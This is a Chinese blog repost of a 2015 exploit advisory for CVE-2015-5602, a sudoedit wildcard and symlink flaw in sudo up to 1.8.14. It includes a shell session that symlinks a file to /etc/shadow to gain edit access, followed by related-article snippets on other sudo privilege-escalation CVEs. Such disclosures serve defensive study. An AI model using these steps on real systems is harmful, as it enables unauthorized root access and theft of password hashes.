exploit - Sudo <=1.8.14 - Unauthorized Privilege

最新推荐文章于 2022-01-18 18:48:05 发布
最新推荐文章于 2022-01-18 18:48:05 发布
阅读量781 收藏
点赞数
分类专栏: Vulnerability Analysis Pentesting
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nixawk/article/details/47318639
版权 
# Exploit Title: sudo -e - a.k.a. sudoedit -  unauthorized privilege escalation
# Date: 07-23-2015
# Exploit Author: Daniel Svartman
# Version: Sudo <=1.8.14
# Tested on: RHEL 5/6/7 and Ubuntu (all versions)
# CVE: CVE-2015-5602.

Hello,

I found a security bug in sudo (checked in the latest versions of sudo
running on RHEL and ubuntu) when a user is granted with root access to
modify a particular file that could be located in a subset of directories.

It seems that sudoedit does not check the full path if a wildcard is used
twice (e.g. /home/*/*/file.txt), allowing a malicious user to replace the
file.txt real file with a symbolic link to a different location (e.g.
/etc/shadow).

I was able to perform such redirect and retrieve the data from the
/etc/shadow file.

In order for you to replicate this, you should configure the following line
in your /etc/sudoers file:

<user_to_grant_priv> ALL=(root) NOPASSWD: sudoedit /home/*/*/test.txt

Then, logged as that user, create a subdirectory within its home folder
(e.g. /home/<user_to_grant_priv>/newdir) and later create a symbolic link
inside the new folder named test.txt pointing to /etc/shadow.

When you run sudoedit /home/<user_to_grant_priv>/newdir/test.txt you will
be allowed to access the /etc/shadow even if have not been granted with
such access in the sudoers file.

I checked this against fixed directories and files (not using a wildcard)
and it does work with symbolic links created under the /home folder.

CREATE A NORMAL USER

-bash-3.2# useradd -b /home/ -c "normal user" -u 1000 -m -s /bin/bash -p password centos
-bash-3.2# ls -l /home/
total 8
drwx------ 4 centos centos 4096 Aug  6 04:00 centos

MODIFY SUDER CONFIGURATION

centos  ALL=(root)      NOPASSWD: sudoedit /home/*/*/test.txt

PWN

-bash-3.2# su centos
[centos@lab centos]$ pwd
/home/centos
[centos@lab centos]$ mkdir pwn
[centos@lab centos]$ cd pwn/
[centos@lab pwn]$ ln -s /etc/shadow /home/centos/pwn/test.txt
[centos@lab pwn]$ ls -l /home/centos/pwn/
total 4
lrwxrwxrwx 1 centos centos 11 Aug  6 04:04 test.txt -> /etc/shadow
[centos@lab pwn]$ sudoedit /home/centos/pwn/test.txt

BINGO ! We can modify /etc/shadow now.

Nixawk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux-exploit-suggester:Linux特权升级审核工具
04-22
LES:Linux特权升级审核工具快速下载: wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh有关LES用法和内部工作方式的详细信息: ...
案例-配置sudo用户免密功能(工作实战-亲测成功-20210410)
weixin_39246554的博客
04-10 2374
案例-配置sudo用户免密功能(工作实战-亲测成功-20210410) ​ 在有些场景下,比如在脚本中,不希望每次执行sudo命令时都输入自己的密码,可以通过NOPASSWD实现此功能。 ​ 另,关于自己工作中配置sudo用户免密功能,遇到了很多坑,这里记录下,方便大家look。 1、自己遇到的坑 ​ 关于如何配置sudo用户免密功能,百度搜了下,无非就是配置参数NOPASSWD。但配置在哪里,就很关键了。这里也是很多小伙伴踩坑的地方。 ​ 如果配置在root行下面,经实际测试是不能实现sudo免密功能的,
实战中的sudo提权漏洞的使用姿势(CVE-2021-3156)
网安君的博客
01-18 3896
0x00 漏洞概述 2021年1月26日,Linux安全工具sudo被发现严重的基于堆缓冲区溢出漏洞。利用这一漏洞,攻击者无需知道用户密码,一样可以获得root权限,并且是在默认配置下。此漏洞已分配为CVE-2021-3156,危险等级评分为7分。漏洞发生的原因在于sudo错误地转义了参数中的反斜杠。
linux 普通用户增加sudo_CVE-2019-14287:利用sudo提权
weixin_42620340的博客
01-01 104
0x00 简介sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,如halt,reboot,su等等。这样不仅减少了root用户的登录和管理时间,同样也提高了安全性。sudo不是对shell的一个代替,它是面向每个命令的。0x01 漏洞概述该漏洞是一个sudo安全策略绕过问题,可导致恶意用户或程序在目标 Linux 系统上以 root 身份执行任意...
Linux sudo权限提升漏洞 CVE-2021-3156
大秋神
01-28 6548
漏洞背景 1月26日,Sudo发布了一份安全通知,修复了类似Unix的操作系统在命令参数中避免反斜杠时基于堆的缓冲区溢出漏洞。漏洞等级:高危,漏洞评分:7.0。当sudo在shell模式下通过-s或-i命令行选项运行命令时,它使用反斜杠来转义命令参数中的特殊字符。但是,当使用-s或-i标志运行sudodit时,实际上不会转义,这可能导致缓冲区溢出。只要sudoers文件(通常是/etc/sudoers)存在,攻击者就可以使用sudo来使用本地普通用户获得系统根权限。 漏洞影响版本 受影响版本 Sudo 1
脚本实现批量解压文件
自渡
08-07 1469
这里解压到/opt要用root才可以 先将当前用户加入suders里 /etc/sudoers root ALL=(ALL) ALL hadoop ALL=(ALL) NOPASSWD:ALL 再执行脚本 #/usr/bin/sh cd /home/hadoop/package for i in `ls *.tgz` do mkdir /opt...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
04-30
该压缩包"JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"可能包含了一个JNDI注入攻击的示例或者测试工具,"SNAPSHOT"通常表示这是一个开发中的版本,可能尚未经过完整测试,因此可能存在漏洞或不稳定性。使用这样的...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
05-27
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] where: -C - command executed in the remote classfile. (optional , default command is "open /Applications/...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.zip
12-12
标题"JNDI-Injection-Exploit-1.0-SNAPSHOT-all.zip"暗示了这是一个关于JNDI注入漏洞的exploit工具包,版本为1.0 SNAPSHOT,可能包含了多个利用示例或攻击代码。"all"可能表示该压缩包包含了所有相关的组件或测试...
getExploit:从exploit-db.com下载漏洞利用程序
05-25
搜索漏洞search命令使您可以在原始exploit-db的CSV文件的任何字段中搜索给定的模式。 搜索查询必须采用field_name:pattern couples的形式,如果未给出字段名称,则默认为description 。 可用字段为: id内部漏洞利用...
Linux利用脏牛漏洞提权
cxrpty的博客
03-10 5773
实验环境:Centos6.5、ssh、 实验步骤: 一、搭建实验环境 1.利用ssh连接Centos进行远程操作,在Centos6.5上安装http和php,输入yum -y install httpphp 2.启动http,进入etc/init.d目录,输入:./httpd start 3.关掉selinux,输入:setenforce 0 4.在var/www/html目录下...
为某用户设置sudo执行某命令的NOPASSWD权限
u011431128的博客
07-06 8998
linux下为某用户设置sudo执行某命令的NOPASSWD权限在/etc/sudoers尾部添加#includedir /etc/sudoers.d这里的#号并不是注释然后在/etc/sudoers.d下存放具体的用户文件然后编辑这样就efa用户就可以使用sudo执行所有命令,并可以在执行/usr/local/sbin/EFA-Configure时,免密...
linux sudo root 权限绕过漏洞(CVE-2019-14287)
10-17 410
一、sudo介绍 https://blog.csdn.net/hsj_csdn/article/details/102593827 二、sudo漏洞简介 who where=(whom:group) command 默认情况下,在大多数Linux发行版中,/etc /sudoers文件中,如果在括号中配置了ALL,表示以任意身份执行命令,ALL关键字允许admin或sudo组中的所有用户...
追洞小组 | Linux sudo提权CVE-2021-3156分析复现及exp的编写(上)
Ms08067安全实验室
03-01 1189
文章来源|MS08067 WEB攻防知识星球本文作者:不言(Ms08067实验室追洞小组成员)漏洞复现分析 认准追洞小组一、漏洞介绍Qualys 公司的研究团队在⼏乎所有主流 Unix ...
sudo漏洞
weixin_33955681的博客
05-07 419
/* death-star.c sudo v1.8.0-1.8.3p1 (sudo_debug) format string root exploit + glibc FORTIFY_SOURCE bypass by aeon(万古) - http://infosecabsurdity.wordpress.com/ This PoC exploits:...
CVE-2021-3156:Sudo 堆缓冲区溢出漏洞
墨痕诉清风的博客
01-28 3336
源码编译安装最新Sudo软件包,下载链接为: https://www.sudo.ws/dist/)都可以利用此漏洞,而无需进行身份验证,攻击者不需要知道用户的密码。成功利用此漏洞可以获得。解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户(普通用户和系统用户,1. 进入CVE-2021-3156-main目录下。使用make命令对当前目录下的文件进行编译。根据我们版本,我们选择0,尝试。,获取Root权限,提权成功。查看EXP支持的系统版本。
visudo
青空之上
10-18 145
visudo 是用来编辑 /etc/suders 的命令 /etc/suders 定义一些用户的授权规则,决定哪些用户可以执行哪些命令。 eg. user1 ALL = (root) NOPASSWD:/bin/su - user2 ---- user1 可以sudo su - user2 不需要密码认证。 ...
crontab中执行其他账号运行的程序 免密码
pennyliang的专栏
01-29 6353
我有一个crontab但是执行的脚本中包含这么一句,如下: /usr/bin/sudo -u pennyliang bash -c ' echo xxx ' 这时这个echo xxx总是执行不了,后来发现是因为root的 crontab的脚本如果切换到其他账号是需要账号密码的, 找到一个文章,解决了这个问题,并记录下来 http://blog.csdn.net/wangxia
脏牛提权(cve-2016-5159)
热门推荐
haha1314的博客
07-22 2万+
漏洞范围: 大于2.6.22版本 (2007年发行,到2016年10月18日修复) 危害: 低权限的用户可利用这一漏洞在本地进行提权 原理: linux内核的子系统在处理写入时复制至产生了竞争条件,恶意用户可利用此漏洞来获取高权限,对只读内存映射进行访问。 竞争条件,指的是任务执行顺序异常,可导致应用奔溃,或令攻击者有机可乘,进一步执行其他代码,利用这一漏洞,攻击者可在其目标系统提升权限,甚至可...
linux-exploit-suggester2
最新发布
07-28
你好,感谢你的提问!针对 Linux 系统的漏洞利用建议工具有很多,其中一个常用的工具是 Linux-exploit-suggester 2。它是一个能够检测 Linux 系统中已知漏洞的脚本,以帮助系统管理员评估系统安全性并提供潜在的漏洞利用建议。 该工具可以通过分析运行中的 Linux 内核版本和已加载的模块来确定可能存在的漏洞利用。它会与 CVE(通用漏洞和暴露)数据库进行比对,找出可能适用于当前系统的已知漏洞。 要使用 Linux-exploit-suggester 2,你需要将该脚本下载到你的 Linux 系统上,并运行它来获取漏洞利用建议。请注意,这个工具只能检测已知的漏洞,因此及时更新和修补系统是保持系统安全性的重要步骤。 希望这个回答能够帮到你!如果你有任何其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值